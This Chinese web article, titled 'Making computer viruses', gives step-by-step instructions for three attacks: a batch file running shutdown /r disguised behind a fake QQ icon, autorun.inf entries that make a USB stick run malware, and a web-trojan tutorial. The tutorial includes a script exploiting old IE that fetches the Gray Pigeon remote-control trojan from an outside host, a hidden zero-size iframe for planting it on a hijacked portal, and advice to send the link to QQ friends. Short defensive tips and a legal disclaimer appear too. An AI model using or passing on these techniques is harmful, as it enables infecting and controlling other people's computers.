制作电脑病毒

时间：2017-05-26 06:02 来源：免费论文网

篇一：制作Restart病毒

1、建立记事本输入shutdown /r（自动重新启动本地计算机）

2、保存记事本命名为腾讯QQ.txt

3、右击记事本。重命名，改扩展名为bat，在弹出来的对话框中单击“是”

4、右击创建快捷方式，在快捷方式中单击属性，更改合适的QQ图标

5、隐藏原bat文件，此时桌面上只有假冒的QQ图标，用户一旦双击，计算机便重新启动

注：

图片，名称可自选

预防措施，显示文件扩展名，对.Bat文件留意，最好再打开前执行“编辑”“操作，看懂里面的内容，这就要熟悉dos常见命令了

篇二：制作简单U盘病毒

1制作简单的U盘病毒

现象有autorun.inf文件及有autorun.inf文件中写入的文件用记事本打开autorun.inf如下 autorun open.cmd.exe shellopen打开O shellopencommand.cmd.exe shellopenDefault1

shellexplore资源管理器X shellexplorecommand.cmd.exe 然后设置文件的隐藏属性 attrib Autorun.inf -a -s -r -h 删除此病毒的方法是用rar打开此磁盘直接删除此两个文件或者把autorun.inf里的语句有病毒程序的地方如.cmd.exe删除 autorun.inf文件是从Windows95开始的最初用在其安装盘里实现自动安装以后的各版本都保留了该文件并且部分内容也可用于其他存储设备。其结构有三个部分AutoRun AutoRun.Alpha DeviceInstall AutoRun适用于Windows95以上系统与32位以上CD-ROM必选。 AutoRun.alpha适用于基于RISC的计算机光驱适用系统为Windows NT 4.0可选。 DeviceInstall适用于Windows XP以上系统可选。 AutoRun部分的命令及其详解 1、DefaultIcon 含义指定应用程序的默认图标。格式 DefalutIcon图标路径名序号参数图标文件名应用程序的默认图标路径名格式可以为.ico、.bmp、.exe、.dll。当文件格式为.exe和.dll时有时需要使用序号来指定图标。序号当文件格式为.exe和.dll时文件可能包括多余一个图标此时需要使用序号来指定图标需要注意的是序号是从0开始的。备注应用程序的默认图标将在windows explorer核心的驱动显示窗口中替代设备的默认图标来显示。图标路径名的默认目录是设备根目录。 2、Icon 含义指定设备显示图标。格式 Icon图标路径名序号参数图标文件名应用程序的默认图标路径名格式可以

为.ico、.bmp、.exe、.dll。当文件格式为.exe和.dll时有时需要使用序号来指定图标。序号当文件格式为.exe和.dll时文件可能包括多余一个图标此时需要使用序号来指定图标需要注意的是序号是从0开始的。备注设备显示图标将在windows explorer核心的驱动显示窗口中替代设备的默认图标来显示。图标路径名的默认目录是设备根目录。当存在应用程序默认图标DefaultIcon时本命令无效。 3、Label 含义指定设备描述格式 Label描述参数描述任意文字可以包括空格。备注设备描述将在windows explorer核心的驱动显示窗口中替代设备的默认描述卷标来显示。在非windows explorer核心的驱动显示窗口中例如右击设备选择属性显示的仍然是设备的卷标。 4、Open 含义指定设备启用时运行之命令行。格式 Open命令行命令行程序路径名参数参数命令行自动运行的命令行必须是.exe、.com、.bat文件其他格式文件可以使用start.exe打开或使用ShellExecute命令。备注命令行的起始目录是设备根目录和系统的Path环境变量。 5、ShellExecute 含义指定设备启用时执行文件。操作系统支持未知格式 ShellExecute执行文件路径名参数参数执行文件路径名设备启用时执行文件路径名。可以是任意格式文件。系统会调用设置的程序执行此文件。参数参数根据执行文件作调整备注命令行的起始目录是设备根目录和系统的Path环境变量。 6、Shell关键字Command 含义定义设备右键菜单执行命令行。格式 Shell关键字Command命令行命令行程序路径名参数参数命令行自动运行的命令行必须是.exe、.com、.bat文件其他格式文件可以

使用start.exe打开。备注命令行的起始目录是设备根目录和系统的Path环境变量。 7、Shell关键字含义定义设备右键菜单文本。格式 Shell关键字文本参数关键字用以标记菜单可以使用任何字符表示包括空格。文本在右键菜单中显示的文本。可以使用任何字符不能存在空格。备注在同一Autorun.inf文件中不同右键菜单关键字不同相同右键菜单关键字相同。右键菜单文本中可以使用设定加速键输出一个。 Shell关键字Command命令Shell关键字两者缺一不可顺序无所谓。当不存在Open、ShellExecute与Shell命令时设备启用时运行第一个设备右键菜单指定命令。 8、Shell 含义定义设备启用时运行之设备右键命令。格式 Shell关键字参数关键字标记过的菜单关键字备注 Shell指定的关键字可以在AutoRun.inf文件的任意部分。 OpenShellExecuteShell命令后定义的优先级高。 AutoRun opencmd.exe shellopen打开O shellopenCommand成分.bat shellopenDefault1 shellexplore资源管理器X shellexploreCommand成分.bat 大家一起来学习点实用知识吧网上曾经有方法教大家在命令提示符下输入 md x:123...在X盘下建立不可删除的文件夹。其实利用这个原理还可以做成免疫闪存。原理闪存病毒一般会在各个盘符下生成Autorun.inf文件夹目的是用户打开该盘时病毒自动运行。那么我们就在各个盘的根目录下建立无法删除或者覆盖的Autorun.inf文件。具体操作如下。建立txt文本文件命名为闪存免疫输入以下代码 md c:Autorun.inf md c:Autorun.inf1234... md x:Autorun.inf md x:Autorun.inf1234... X代表盘符你有几个盘就可以输入几个保存退

出并将TXT文件转化为BAT批处理文件双击运行在各个盘符的根目录下会出现Autorun.inf文件夹并且因为它们的文件夹内有不可删除文件所以该文件夹也无法删除。这样免疫闪存就做成了

篇三：网页木马制作全过程(详细)

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页，经检查，我确实中了灰鸽子。怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。一、网页木马的攻击原理

首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序

小提示：代码说明

a. 代码中“src”的属性为程序的网络地址，本例中

“http://go163go.vicp.net/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

b. 也可以把木马程序上传到免费的主页空间上去，但免费空间出于安全的考虑，多数不允许上传exe文件，黑客可能变通一下把扩展名exe改为bat或com，这样他们就可以把这些程序上传到服务器上了。把这段代码插入到网页源代码的</BODY>?</BODY>之间（如图1），然后用没打补丁的IE6打开，接下来，打开IE的临时目录<Temporary Internet Files>，

你会发现，在该文件夹中有一个“1.exe”文件，这也就是说，该网页已自动下载了我放置在Web服务器上的灰鸽子木马。

图1

网页

木马示例

小提示：灰鸽子木马

为什么一定要用灰鸽子木马呢？因为灰鸽子是反弹型木马，该木马能绕过天网等大多数防火墙的拦截，中马后，服务端即被控端能主动连接控制端（客户端），也就是说，一旦被控端连接到Internet，在控制端那里，被控端就会“自动上线”（如图2）。

图2 灰鸽子控制短示例（汗！又一大毒枭:)）

⒉自动运行程序

<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application");

shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT> 把这段代码插入到网页源代码的</BODY>?</BODY>之间，然后用IE打开该网页，你会发现，这段代码可以在没有打相关补丁的IE6中自动打开记事本。这段代码使用了shell.application控件，该控件能使网页获得执行权限，替换代码中的“Notepad.exe”（记事本）程序，可以用它自动运行本地电脑上的任意程序。

通过以上的代码我们可以看出，利用IE的漏洞，也就是说在网页中插入适当的代码，IE完全可以自动下载和运行程序，不过，IE一旦打了相关补丁，这些代码就会失去作用。另外，这些代码要运行和下载程序，有些杀毒软件的网页监控会视它们为病毒，为了逃避追杀，黑客可能会使用一些工具对网页的源代码进行加密处理（如图3）。图3 加密后的网页代码

二、网页木马的基本用法

理解了网页木马攻击的原理，我们可以制作自己的网页木马，但这需要你根据IE漏洞写出利用代码。实际上，在网上有很多高手已写出了一些漏洞的利用代码，有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索，你会发现，在网上有很多利用IE的各种漏洞编写的网页

木马生成器，它们大都为可视化的程序，只要你有一个木马（该木马必须把它放置到网络上），

利用这些生成器你就可以立即生成一个网页，该网页就是网页木马，只要他人打开这个网页，该网页就可以自动完成下载木马并运行（安装）木马的过程。在我的电脑上我已下载了一个网页木马生成器，下面我们来看怎么生成网页木马并让他人中木马。

第一步：启动该网页木马生成器，如图4所示，在文本框中输入木马的网络地址，最后单击“生成”。

图4

网页木马生成器

第二步：在网页木马生成器的安装文件夹会生成一个网页文件，该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。现在好了，把上述网页在服务器上的地址（网址）通过QQ发给自己的好友，一旦他访问了该网页，该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。

现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧！实际上，即使人人都不打开陌生人发来的网址，也仍然有一些人“飞蛾补灯，自寻死路”，因为若大的Internet，总会有一些人会有意或无意地访问这些网址，而且，有些网页木马，还挂在一些知名网站上（根据知名网站的访问量，你算算吧，每天有多少人中了木马！）。

小提示：你可能还没想到，看电影，在论坛查看或回复帖子也能中木马。实际上，网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上，这样，用户一旦观看电影、查看或预览邮件（主要是一些用电子邮件群发器发送的垃圾邮件）、参与帖子，打开电子书，用户就会中网页木马。

在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码：iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0"></iframe>

小提示：“src”的属性“http://go163go.vicp.net/hk.htm”是上传到服务器上的网页木马的网址。

把这段代码插入到某门户网站首页源代码的</BODY>?</BODY>之间，从表面上看，插入后该门户的首页并没有什么变化，但是，所有访问了该门户网站首页的人都会中木马，为什么会这样呢？这是因为这段代码中<iframe>标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中。

图5 iframe标签示例

也许有人会问，如何把上述代码插入到门户网站首页的源代码中？这个问题问得好，本人才疏学浅，确实无法进入他们的服务器修改网页，但是黑客如果发现了这些服务器上的漏洞且获得了webshell权限，那么修改他们的网页就跟在本地制作一个网页一样容易。

有人还问，拿到服务器的webshell权限容易吗？如果你对网络安全比较关注，你会发现，经常有这个网站被黑了，那个网站的主页被修改了的新闻爆出。有人还问，门户的服务器几乎无漏洞可找，个人服务器的漏洞较多，

你能进入吗？本人不是黑客，中华人民共和国的法律规定，入侵和篡改他人服务器上的信息是违法行为，希望大家共同维护网络安全。

《制作电脑病毒》
由：免费论文网互联网用户整理提供,链接地址：
http://m.csmayi.cn/meiwen/42414.html
转载请保留,谢谢!